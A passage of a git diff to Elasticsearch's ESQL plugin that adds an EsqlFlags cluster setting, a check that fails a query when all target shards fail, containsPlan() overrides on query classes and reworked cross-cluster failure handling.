EsqlExecutionInfo.Cluster.Status.PARTIAL + : EsqlExecutionInfo.Cluster.Status.SUCCESSFUL; builder.setStatus(status); } return builder.build(); @@ -408,6 +418,7 @@ public void executePlan( sessionId, profileDescription(profileQualifier, "final"), LOCAL_CLUSTER, + flags, List.of(), configuration, foldContext, @@ -424,6 +435,7 @@ public void executePlan( sessionId, LOCAL_CLUSTER, rootTask, + flags, configuration, dataNodePlan, Set.of(localConcreteIndices.indices()), @@ -438,7 +450,7 @@ public void executePlan( .setSuccessfulShards(r.getSuccessfulShards()) .setSkippedShards(r.getSkippedShards()) .setFailedShards(r.getFailedShards()) - .setFailures(r.failures) + .addFailures(r.failures) .build() ); dataNodesListener.onResponse(r.getCompletionInfo()); @@ -448,7 +460,7 @@ public void executePlan( LOCAL_CLUSTER, (k, v) -> new EsqlExecutionInfo.Cluster.Builder(v).setStatus( EsqlExecutionInfo.Cluster.Status.PARTIAL - ).setFailures(List.of(new ShardSearchFailure(e))).build() + ).addFailures(List.of(new ShardSearchFailure(e))).build() ); dataNodesListener.onResponse(DriverCompletionInfo.EMPTY); } else { @@ -529,6 +541,47 @@ private static void updateExecutionInfoAfterCoordinatorOnlyQuery(EsqlExecutionIn } } + /** + * If all of target shards excluding the skipped shards failed from the local or remote clusters, then we should fail the entire query + * regardless of the partial_results configuration or skip_unavailable setting. This behavior doesn't fully align with the search API, + * which doesn't consider the failures from the remote clusters when skip_unavailable is true. + */ + static void failIfAllShardsFailed(EsqlExecutionInfo execInfo, List finalResults) { + // do not fail if any final result has results + if (finalResults.stream().anyMatch(p -> p.getPositionCount() > 0)) { + return; + } + int totalFailedShards = 0; + for (EsqlExecutionInfo.Cluster cluster : execInfo.clusterInfo.values()) { + final Integer successfulShards = cluster.getSuccessfulShards(); + if (successfulShards != null && successfulShards > 0) { + return; + } + if (cluster.getFailedShards() != null) { + totalFailedShards += cluster.getFailedShards(); + } + } + if (totalFailedShards == 0) { + return; + } + final var failureCollector = new FailureCollector(); + for (EsqlExecutionInfo.Cluster cluster : execInfo.clusterInfo.values()) { + var failedShards = cluster.getFailedShards(); + if (failedShards != null && failedShards > 0) { + assert cluster.getFailures().isEmpty() == false : "expected failures for cluster [" + cluster.getClusterAlias() + "]"; + for (ShardSearchFailure failure : cluster.getFailures()) { + if (failure.getCause() instanceof Exception e) { + failureCollector.unwrapAndCollect(e); + } else { + assert false : "unexpected failure: " + new AssertionError(failure.getCause()); + failureCollector.unwrapAndCollect(failure); + } + } + } + } + ExceptionsHelper.reThrowIfNotNull(failureCollector.getFailure()); + } + void runCompute(CancellableTask task, ComputeContext context, PhysicalPlan plan, ActionListener listener) { listener = ActionListener.runBefore(listener, () -> Releasables.close(context.searchContexts())); List contexts = new ArrayList<>(context.searchContexts().size()); @@ -554,7 +607,7 @@ public SourceProvider createSourceProvider() { context.foldCtx(), contexts, searchService.getIndicesService().getAnalysis(), - defaultDataPartitioning + physicalSettings ); try { LocalExecutionPlanner planner = new LocalExecutionPlanner( @@ -576,7 +629,13 @@ public SourceProvider createSourceProvider() { LOGGER.debug("Received 
physical plan:\n{}", plan); - var localPlan = PlannerUtils.localPlan(context.searchExecutionContexts(), context.configuration(), context.foldCtx(), plan); + var localPlan = PlannerUtils.localPlan( + context.flags(), + context.searchExecutionContexts(), + context.configuration(), + context.foldCtx(), + plan + ); // the planner will also set the driver parallelism in LocalExecutionPlanner.LocalExecutionPlan (used down below) // it's doing this in the planning of EsQueryExec (the source of the data) // see also EsPhysicalOperationProviders.sourcePhysicalOperation @@ -592,23 +651,36 @@ public SourceProvider createSourceProvider() { throw new IllegalStateException("no drivers created"); } LOGGER.debug("using {} drivers", drivers.size()); - driverRunner.executeDrivers( - task, - drivers, - transportService.getThreadPool().executor(ESQL_WORKER_THREAD_POOL_NAME), - ActionListener.releaseAfter(listener.map(ignored -> { - if (context.configuration().profile()) { - return DriverCompletionInfo.includingProfiles( + ActionListener driverListener = listener.map(ignored -> { + if (LOGGER.isDebugEnabled()) { + LOGGER.debug( + "finished {}", + DriverCompletionInfo.includingProfiles( drivers, context.description(), clusterService.getClusterName().value(), transportService.getLocalNode().getName(), localPlan.toString() - ); - } else { - return DriverCompletionInfo.excludingProfiles(drivers); - } - }), () -> Releasables.close(drivers)) + ) + ); + } + if (context.configuration().profile()) { + return DriverCompletionInfo.includingProfiles( + drivers, + context.description(), + clusterService.getClusterName().value(), + transportService.getLocalNode().getName(), + localPlan.toString() + ); + } else { + return DriverCompletionInfo.excludingProfiles(drivers); + } + }); + driverRunner.executeDrivers( + task, + drivers, + transportService.getThreadPool().executor(ESQL_WORKER_THREAD_POOL_NAME), + ActionListener.releaseAfter(driverListener, () -> Releasables.close(drivers)) ); } catch (Exception e) { listener.onFailure(e); @@ -652,6 +724,10 @@ CancellableTask createGroupTask(Task parentTask, Supplier description) t } } + public EsqlFlags createFlags() { + return new EsqlFlags(clusterService.getClusterSettings()); + } + private static class ComputeGroupTaskRequest extends AbstractTransportRequest { private final Supplier parentDescription; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeComputeHandler.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeComputeHandler.java index 0de272502e1c7..aea1c7d6d2d67 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeComputeHandler.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeComputeHandler.java @@ -99,6 +99,7 @@ void startComputeOnDataNodes( String sessionId, String clusterAlias, CancellableTask parentTask, + EsqlFlags flags, Configuration configuration, PhysicalPlan dataNodePlan, Set concreteIndices, @@ -116,7 +117,7 @@ void startComputeOnDataNodes( esqlExecutor, parentTask, originalIndices, - PlannerUtils.canMatchFilter(dataNodePlan), + PlannerUtils.canMatchFilter(flags, configuration, clusterService.state().getMinTransportVersion(), dataNodePlan), clusterAlias, configuration.allowPartialResults(), maxConcurrentNodesPerCluster == null ? 
-1 : maxConcurrentNodesPerCluster, @@ -219,6 +220,7 @@ protected void sendRequest( } private class DataNodeRequestExecutor { + private final EsqlFlags flags; private final DataNodeRequest request; private final CancellableTask parentTask; private final ExchangeSinkHandler exchangeSink; @@ -229,6 +231,7 @@ private class DataNodeRequestExecutor { private final Map shardLevelFailures; DataNodeRequestExecutor( + EsqlFlags flags, DataNodeRequest request, CancellableTask parentTask, ExchangeSinkHandler exchangeSink, @@ -237,6 +240,7 @@ private class DataNodeRequestExecutor { Map shardLevelFailures, ComputeListener computeListener ) { + this.flags = flags; this.request = request; this.parentTask = parentTask; this.exchangeSink = exchangeSink; @@ -297,6 +301,7 @@ public void onFailure(Exception e) { sessionId, "data", clusterAlias, + flags, searchContexts, configuration, configuration.newFoldContext(), @@ -422,7 +427,9 @@ private void runComputeOnDataNode( exchangeService.finishSinkHandler(externalId, new TaskCancelledException(task.getReasonCancelled())); exchangeService.finishSinkHandler(request.sessionId(), new TaskCancelledException(task.getReasonCancelled())); }); + EsqlFlags flags = computeService.createFlags(); DataNodeRequestExecutor dataNodeRequestExecutor = new DataNodeRequestExecutor( + flags, request, task, internalSink, @@ -442,6 +449,7 @@ private void runComputeOnDataNode( request.sessionId(), "node_reduce", request.clusterAlias(), + flags, List.of(), request.configuration(), new FoldContext(request.pragmas().foldLimit().getBytes()), diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSender.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSender.java index 4409201606d0a..469a3fd0816c1 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSender.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSender.java @@ -134,17 +134,20 @@ final void startComputeOnDataNodes(Set concreteIndices, Runnable runOnTa var computeListener = new ComputeListener( transportService.getThreadPool(), runOnTaskFailure, - listener.map( - completionInfo -> new ComputeResponse( + listener.map(completionInfo -> { + final int totalSkipShards = targetShards.skippedShards() + skippedShards.get(); + final int failedShards = shardFailures.size(); + final int successfulShards = targetShards.totalShards() - totalSkipShards - failedShards; + return new ComputeResponse( completionInfo, timeValueNanos(System.nanoTime() - startTimeInNanos), targetShards.totalShards(), - targetShards.totalShards() - shardFailures.size() - skippedShards.get(), - targetShards.skippedShards() + skippedShards.get(), - shardFailures.size(), + successfulShards, + totalSkipShards, + failedShards, selectFailures() - ) - ) + ); + }) ) ) { pendingShardIds.addAll(order(targetShards)); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlFlags.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlFlags.java new file mode 100644 index 0000000000000..09ef93d56e9ee --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlFlags.java @@ -0,0 +1,34 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. 
Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.plugin; + +import org.elasticsearch.common.settings.ClusterSettings; +import org.elasticsearch.common.settings.Setting; + +public class EsqlFlags { + public static final Setting ESQL_STRING_LIKE_ON_INDEX = Setting.boolSetting( + "esql.query.string_like_on_index", + true, + Setting.Property.NodeScope, + Setting.Property.Dynamic + ); + + private final boolean stringLikeOnIndex; + + public EsqlFlags(boolean stringLikeOnIndex) { + this.stringLikeOnIndex = stringLikeOnIndex; + } + + public EsqlFlags(ClusterSettings settings) { + this.stringLikeOnIndex = settings.get(ESQL_STRING_LIKE_ON_INDEX); + } + + public boolean stringLikeOnIndex() { + return stringLikeOnIndex; + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlPlugin.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlPlugin.java index 293a7be6be041..776874fbf90f6 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlPlugin.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlPlugin.java @@ -21,10 +21,9 @@ import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BlockFactoryProvider; -import org.elasticsearch.compute.lucene.DataPartitioning; import org.elasticsearch.compute.lucene.LuceneOperator; import org.elasticsearch.compute.lucene.TimeSeriesSourceOperator; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus; import org.elasticsearch.compute.operator.AbstractPageMappingOperator; import org.elasticsearch.compute.operator.AbstractPageMappingToIteratorOperator; import org.elasticsearch.compute.operator.AggregationOperator; @@ -33,6 +32,7 @@ import org.elasticsearch.compute.operator.HashAggregationOperator; import org.elasticsearch.compute.operator.LimitOperator; import org.elasticsearch.compute.operator.MvExpandOperator; +import org.elasticsearch.compute.operator.SampleOperator; import org.elasticsearch.compute.operator.exchange.ExchangeService; import org.elasticsearch.compute.operator.exchange.ExchangeSinkOperator; import org.elasticsearch.compute.operator.exchange.ExchangeSourceOperator; @@ -72,7 +72,10 @@ import org.elasticsearch.xpack.esql.enrich.LookupFromIndexOperator; import org.elasticsearch.xpack.esql.execution.PlanExecutor; import org.elasticsearch.xpack.esql.expression.ExpressionWritables; +import org.elasticsearch.xpack.esql.io.stream.ExpressionQueryBuilder; +import org.elasticsearch.xpack.esql.io.stream.PlanStreamWrapperQueryBuilder; import org.elasticsearch.xpack.esql.plan.PlanWritables; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; import org.elasticsearch.xpack.esql.querydsl.query.SingleValueQuery; import org.elasticsearch.xpack.esql.querylog.EsqlQueryLog; import org.elasticsearch.xpack.esql.session.IndexResolver; @@ -158,14 +161,6 @@ public class EsqlPlugin extends Plugin implements ActionPlugin, ExtensiblePlugin Setting.Property.Dynamic ); - public static final Setting DEFAULT_DATA_PARTITIONING = Setting.enumSetting( - DataPartitioning.class, - "esql.default_data_partitioning", - DataPartitioning.AUTO, - Setting.Property.NodeScope, - Setting.Property.Dynamic - ); - /** * Tuning parameter for deciding when to use the 
"merge" stored field loader. * Think of it as "how similar to a sequential block of documents do I have to @@ -261,8 +256,10 @@ public List> getSettings() { ESQL_QUERYLOG_THRESHOLD_INFO_SETTING, ESQL_QUERYLOG_THRESHOLD_WARN_SETTING, ESQL_QUERYLOG_INCLUDE_USER_SETTING, - DEFAULT_DATA_PARTITIONING, - STORED_FIELDS_SEQUENTIAL_PROPORTION + PhysicalSettings.DEFAULT_DATA_PARTITIONING, + PhysicalSettings.VALUES_LOADING_JUMBO_SIZE, + STORED_FIELDS_SEQUENTIAL_PROPORTION, + EsqlFlags.ESQL_STRING_LIKE_ON_INDEX ); } @@ -320,11 +317,14 @@ public List getNamedWriteables() { entries.add(TimeSeriesSourceOperator.Status.ENTRY); entries.add(TopNOperatorStatus.ENTRY); entries.add(MvExpandOperator.Status.ENTRY); - entries.add(ValuesSourceReaderOperator.Status.ENTRY); + entries.add(ValuesSourceReaderOperatorStatus.ENTRY); entries.add(SingleValueQuery.ENTRY); entries.add(AsyncOperator.Status.ENTRY); entries.add(EnrichLookupOperator.Status.ENTRY); entries.add(LookupFromIndexOperator.Status.ENTRY); + entries.add(SampleOperator.Status.ENTRY); + entries.add(ExpressionQueryBuilder.ENTRY); + entries.add(PlanStreamWrapperQueryBuilder.ENTRY); entries.addAll(ExpressionWritables.getNamedWriteables()); entries.addAll(PlanWritables.getNamedWriteables()); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/QueryPragmas.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/QueryPragmas.java index 345bf3b8767ef..bdd0e382c3fd3 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/QueryPragmas.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/QueryPragmas.java @@ -22,6 +22,7 @@ import org.elasticsearch.index.mapper.MappedFieldType; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.xpack.esql.core.expression.Expression; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; import java.io.IOException; import java.util.Locale; @@ -45,7 +46,7 @@ public final class QueryPragmas implements Writeable { * the enum {@link DataPartitioning} which has more documentation. Not an * {@link Setting#enumSetting} because those can't have {@code null} defaults. * {@code null} here means "use the default from the cluster setting - * named {@link EsqlPlugin#DEFAULT_DATA_PARTITIONING}." + * named {@link PhysicalSettings#DEFAULT_DATA_PARTITIONING}." 
*/ public static final Setting DATA_PARTITIONING = Setting.simpleString("data_partitioning"); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/TransportEsqlQueryAction.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/TransportEsqlQueryAction.java index 6629b0b09d086..8d67a747f0e02 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/TransportEsqlQueryAction.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/TransportEsqlQueryAction.java @@ -174,6 +174,7 @@ public TransportEsqlQueryAction( defaultAllowPartialResults = EsqlPlugin.QUERY_ALLOW_PARTIAL_RESULTS.get(clusterService.getSettings()); clusterService.getClusterSettings() .addSettingsUpdateConsumer(EsqlPlugin.QUERY_ALLOW_PARTIAL_RESULTS, v -> defaultAllowPartialResults = v); + } @Override @@ -213,6 +214,7 @@ private void innerExecute(Task task, EsqlQueryRequest request, ActionListener computeService.execute( sessionId, (CancellableTask) task, + flags, plan, configuration, foldCtx, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/EqualsSyntheticSourceDelegate.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/EqualsSyntheticSourceDelegate.java index 1db12c873a763..812e741c64d29 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/EqualsSyntheticSourceDelegate.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/EqualsSyntheticSourceDelegate.java @@ -35,6 +35,11 @@ protected String innerToString() { return fieldName + "(delegate):" + value; } + @Override + public boolean containsPlan() { + return false; + } + private class Builder extends BaseTermQueryBuilder { private Builder(String name, String value) { super(name, value); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KnnQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KnnQuery.java index aa0e896dfc013..2946af2ac5c23 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KnnQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KnnQuery.java @@ -81,4 +81,9 @@ public int hashCode() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KqlQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KqlQuery.java index 7ef272f84ec9f..56229ec325d73 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KqlQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KqlQuery.java @@ -87,4 +87,9 @@ protected String innerToString() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchPhraseQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchPhraseQuery.java index be6f244ac4acf..6a10542687490 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchPhraseQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchPhraseQuery.java @@ -108,4 +108,9 @@ public Map 
options() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchQuery.java index 57489cc930bf2..d3d9d810d78fc 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchQuery.java @@ -130,4 +130,9 @@ public Map options() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MultiMatchQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MultiMatchQuery.java index 5526283dfe5a0..0caa22ef92669 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MultiMatchQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MultiMatchQuery.java @@ -114,4 +114,9 @@ protected String innerToString() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SingleValueQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SingleValueQuery.java index 912af6663a9dc..ca1816feba426 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SingleValueQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SingleValueQuery.java @@ -125,6 +125,11 @@ public int hashCode() { return Objects.hash(super.hashCode(), next, field, useSyntheticSourceDelegate); } + @Override + public boolean containsPlan() { + return next.containsPlan(); + } + public abstract static class AbstractBuilder extends AbstractQueryBuilder { private final QueryBuilder next; private final String field; @@ -225,6 +230,10 @@ protected final org.apache.lucene.search.Query simple(MappedFieldType ft, Search builder.add(rewrite, BooleanClause.Occur.FILTER); return builder.build(); } + + public String fieldName() { + return field; + } } /** diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SpatialRelatesQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SpatialRelatesQuery.java index bf0fa72d3af41..98939b5a495f6 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SpatialRelatesQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SpatialRelatesQuery.java @@ -86,6 +86,11 @@ public ShapeRelation shapeRelation() { }; } + @Override + public boolean containsPlan() { + return false; + } + /** * This class is a minimal implementation of the QueryBuilder interface. 
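 * <p>The enclosing SpatialRelatesQuery, like the other leaf queries touched by
 * this patch, reports {@code containsPlan() == false}; only plan-carrying
 * queries (e.g. {@code SingleValueQuery}, which delegates to the query it
 * wraps) answer true and get wrapped before being shipped, as in the
 * PlannerUtils hunk above:
 * <pre>{@code
 * QueryBuilder builder = qlQuery.toQueryBuilder();
 * if (qlQuery.containsPlan()) {
 *     builder = new PlanStreamWrapperQueryBuilder(configuration, builder);
 * }
 * }</pre>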
* We only need the toQuery method, but ESQL makes extensive use of QueryBuilder and trimming that interface down for ESQL only would diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/TranslationAwareExpressionQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/TranslationAwareExpressionQuery.java index d61101c2f594c..8106f6c6661aa 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/TranslationAwareExpressionQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/TranslationAwareExpressionQuery.java @@ -40,4 +40,9 @@ public boolean scorable() { // All Full Text Functions are translated to queries using this method return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/Configuration.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/Configuration.java index 928c7734cf422..0f66a839bb429 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/Configuration.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/Configuration.java @@ -211,6 +211,23 @@ public Map> tables() { return tables; } + public Configuration withoutTables() { + return new Configuration( + zoneId, + locale, + username, + clusterName, + pragmas, + resultTruncationMaxSize, + resultTruncationDefaultSize, + query, + profile, + Map.of(), + queryStartTimeNanos, + allowPartialResults + ); + } + /** * Enable profiling, sacrificing performance to return information about * what operations are taking the most time. @@ -309,4 +326,11 @@ public String toString() { + '}'; } + /** + * Reads a {@link Configuration} that doesn't contain any {@link Configuration#tables()}. 
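 * <p>Read-side counterpart of {@link #withoutTables()}; a sketch of the
 * intended round trip (stream plumbing omitted, and it assumes the
 * {@code Configuration} was serialized with {@code writeTo}):
 * <pre>{@code
 * configuration.withoutTables().writeTo(out);                // tables replaced with Map.of()
 * Configuration copy = Configuration.readWithoutTables(in);  // null block factory: no blocks expected
 * }</pre>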
+ */ + public static Configuration readWithoutTables(StreamInput in) throws IOException { + BlockStreamInput blockStreamInput = new BlockStreamInput(in, null); + return new Configuration(blockStreamInput); + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtils.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtils.java index 51cb9b35becb1..8b23e46f90a98 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtils.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtils.java @@ -15,11 +15,9 @@ import org.elasticsearch.action.search.ShardSearchFailure; import org.elasticsearch.action.support.IndicesOptions; import org.elasticsearch.common.Strings; -import org.elasticsearch.common.util.set.Sets; import org.elasticsearch.compute.operator.DriverCompletionInfo; import org.elasticsearch.core.Nullable; import org.elasticsearch.index.IndexNotFoundException; -import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.indices.IndicesExpressionGrouper; import org.elasticsearch.license.XPackLicenseState; import org.elasticsearch.transport.ConnectTransportException; @@ -35,27 +33,36 @@ import org.elasticsearch.xpack.esql.plan.IndexPattern; import org.elasticsearch.xpack.esql.plan.logical.LogicalPlan; +import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; -import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Objects; import java.util.Set; +import java.util.stream.Collectors; public class EsqlCCSUtils { private EsqlCCSUtils() {} - static Map determineUnavailableRemoteClusters(List failures) { - Map unavailableRemotes = new HashMap<>(); + static Map> groupFailuresPerCluster(List failures) { + Map> perCluster = new HashMap<>(); for (FieldCapabilitiesFailure failure : failures) { - if (ExceptionsHelper.isRemoteUnavailableException(failure.getException())) { - for (String indexExpression : failure.getIndices()) { - if (indexExpression.indexOf(RemoteClusterAware.REMOTE_CLUSTER_INDEX_SEPARATOR) > 0) { - unavailableRemotes.put(RemoteClusterAware.parseClusterAlias(indexExpression), failure); - } - } + String cluster = RemoteClusterAware.parseClusterAlias(failure.getIndices()[0]); + perCluster.computeIfAbsent(cluster, k -> new ArrayList<>()).add(failure); + } + return perCluster; + } + + static Map determineUnavailableRemoteClusters(Map> failures) { + Map unavailableRemotes = new HashMap<>(failures.size()); + for (var e : failures.entrySet()) { + if (Strings.isEmpty(e.getKey())) { + continue; + } + if (e.getValue().stream().allMatch(f -> ExceptionsHelper.isRemoteUnavailableException(f.getException()))) { + unavailableRemotes.put(e.getKey(), e.getValue().get(0)); } } return unavailableRemotes; @@ -136,8 +143,8 @@ static void updateExecutionInfoToReturnEmptyResult(EsqlExecutionInfo executionIn } else { builder.setStatus(EsqlExecutionInfo.Cluster.Status.SKIPPED); // add this exception to the failures list only if there is no failure already recorded there - if (v.getFailures() == null || v.getFailures().size() == 0) { - builder.setFailures(List.of(new ShardSearchFailure(exceptionForResponse))); + if (v.getFailures().isEmpty()) { + builder.addFailures(List.of(new ShardSearchFailure(exceptionForResponse))); } } return builder.build(); @@ -169,7 +176,11 @@ static String createIndexExpressionFromAvailableClusters(EsqlExecutionInfo execu } } - static void 
updateExecutionInfoWithUnavailableClusters(EsqlExecutionInfo execInfo, Map unavailable) { + static void updateExecutionInfoWithUnavailableClusters( + EsqlExecutionInfo execInfo, + Map> failures + ) { + Map unavailable = determineUnavailableRemoteClusters(failures); for (Map.Entry entry : unavailable.entrySet()) { String clusterAlias = entry.getKey(); boolean skipUnavailable = execInfo.getCluster(clusterAlias).isSkipUnavailable(); @@ -188,18 +199,17 @@ static void updateExecutionInfoWithUnavailableClusters(EsqlExecutionInfo execInf static void updateExecutionInfoWithClustersWithNoMatchingIndices( EsqlExecutionInfo executionInfo, IndexResolution indexResolution, - QueryBuilder filter + boolean usedFilter ) { - Set clustersWithResolvedIndices = new HashSet<>(); - // determine missing clusters + // Get the clusters which are still running, and we will check whether they have any matching indices. + // NOTE: we assume that updateExecutionInfoWithUnavailableClusters() was already run and took care of unavailable clusters. + final Set clustersWithNoMatchingIndices = executionInfo.getClusterStates(Cluster.Status.RUNNING) + .map(Cluster::getClusterAlias) + .collect(Collectors.toSet()); for (String indexName : indexResolution.resolvedIndices()) { - clustersWithResolvedIndices.add(RemoteClusterAware.parseClusterAlias(indexName)); + clustersWithNoMatchingIndices.remove(RemoteClusterAware.parseClusterAlias(indexName)); } - Set clustersRequested = executionInfo.clusterAliases(); - Set clustersWithNoMatchingIndices = Sets.difference(clustersRequested, clustersWithResolvedIndices); - clustersWithNoMatchingIndices.removeAll(indexResolution.unavailableClusters().keySet()); - - /** + /* * Rules enforced at planning time around non-matching indices * 1. fail query if no matching indices on any cluster (VerificationException) - that is handled elsewhere * 2. fail query if a cluster has no matching indices *and* a concrete index was specified - handled here @@ -211,25 +221,21 @@ static void updateExecutionInfoWithClustersWithNoMatchingIndices( * Mark it as SKIPPED with 0 shards searched and took=0. */ for (String c : clustersWithNoMatchingIndices) { - if (executionInfo.getCluster(c).getStatus() != Cluster.Status.RUNNING) { - // if cluster was already in a terminal state, we don't need to check it again - continue; - } final String indexExpression = executionInfo.getCluster(c).getIndexExpression(); if (concreteIndexRequested(executionInfo.getCluster(c).getIndexExpression())) { String error = Strings.format( "Unknown index [%s]", (c.equals(RemoteClusterAware.LOCAL_CLUSTER_GROUP_KEY) ? indexExpression : c + ":" + indexExpression) ); - if (executionInfo.isSkipUnavailable(c) == false) { + if (executionInfo.isSkipUnavailable(c) == false || usedFilter) { if (fatalErrorMessage == null) { fatalErrorMessage = error; } else { fatalErrorMessage += "; " + error; } } - if (filter == null) { - // We check for filter since the filter may be the reason why the index is missing, and then it's ok + if (usedFilter == false) { + // We check for filter since the filter may be the reason why the index is missing, and then we don't want to mark yet markClusterWithFinalStateAndNoShards( executionInfo, c, @@ -238,10 +244,22 @@ static void updateExecutionInfoWithClustersWithNoMatchingIndices( ); } } else { + // We check for the valid resolution because if we have empty resolution it's 